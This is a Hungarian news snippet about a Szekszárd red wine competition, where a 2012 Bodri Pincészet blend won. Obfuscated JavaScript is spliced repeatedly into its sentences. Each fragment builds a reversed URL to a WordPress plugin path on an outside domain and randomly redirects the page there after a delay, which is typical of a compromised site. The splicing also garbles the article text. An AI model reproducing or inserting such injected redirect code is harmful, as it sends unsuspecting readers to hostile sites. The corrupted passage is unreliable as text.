A pénteken zárult, kétnapos megmérettetésen a legjobb vörösbort egy héttagú, szekszárdi borászokból álló zsűri választoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totta ki azon borok közül, amelyek az adható 100 pontból legalább 90 pontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot kaptak a bírálóktól. Idén 19 bor – többek között rozé, kadarka, kadarka, kékfrankos – került a zsűri elé. 2016-ban és 2017-ben a Takler, illetve a Vesztergombi Pince szintén 2012-es merlot-ja kapta az elismerést. Bodri István, a Bodri Pincészet Kft. ügyvezető igazgatója az MTI-nek elmondta: a No. 1 elnevezésű bor 43 százalékban cabernet sauvignonból, 24 százalékban cabernet franc-ból és 33 százalékban merlot-ból készült, 24 hónapon át érlelték új tölgyfahordóban. A versenyre, amelyen 47 termelő…
A cikk folytatódik: http://gasztrokalandok.co.hu/alapfogalmak/2018/03/23/iden-is-egy-2012-es-hazasitas-lett-a-legjobb-vorosbor-szekszardon.html
- Hirdetés -